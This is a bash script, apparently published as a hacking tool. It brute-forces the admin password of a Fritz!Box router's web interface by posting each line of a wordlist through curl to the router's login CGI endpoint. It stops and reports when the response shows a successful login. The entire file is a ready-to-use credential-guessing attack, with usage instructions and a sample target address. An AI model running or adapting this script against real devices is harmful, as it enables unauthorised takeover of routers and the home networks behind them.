#!/bin/bash -
# Bruteforce Fritz!Box
# Code by brixton brixton [dot] hackermail [dot] com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA#
#
clear
if ! test -e .brutefritz.log
then
touch .brutefritz.log
else
echo "" >.brutefritz.log
fi
scan()
{
banner
while read line
do
curl -d "login:command/password=$line" \
-d "getpage=../html/de/menus/menu2.html" \
-d "errorpage=../html/index.html" \
-d "var:lang=de" \
-d "var:pagename=home" \
-d "var:menu=home" \
-s http://$1/cgi-bin/webcm | grep Assistenten >.brutefritz.log
if [ "$(cat .brutefritz.log)" = "" ]
then echo "+++Password no access ->$line"
else echo "+++Password found :) ->$line"
exit
fi
done < $2
}
banner()
{
echo "
\|||/
(o o)
,~~~ooO~~(_)~~~~~~~~~,
| briXtons Fritz!Box |
| Bruteforce |
| Version 1 |
| |
'~~~~~~~~~~~~~~ooO~~~'
|__|__|
|| ||
ooO Ooo
"
}
usage()
{
banner
echo "
$0 -i <ip/url> -w <wordlistfile>
$0 -h this help
example:
$0 -i 192.168.178.1 -w wordlists.lst
testet with FRITZ!Box WLAN 3170 -> Firmware-Version 49.04.58 ->Linux ubuntu 2.6.32-24-generic
"
}
while getopts "w:i:h" Option
do
case $Option in
w) WORDLIST=$OPTARG;;
i) IP=$OPTARG;;
h) usage;exit;;
*) usage;exit;;
esac
done
if [ "$IP" = "" ];then echo "no ip or url";exit;fi
if [ -e $WORDLIST ]; then
scan $IP $WORDLIST
else
echo "File $WORDLIST does not exists"
fi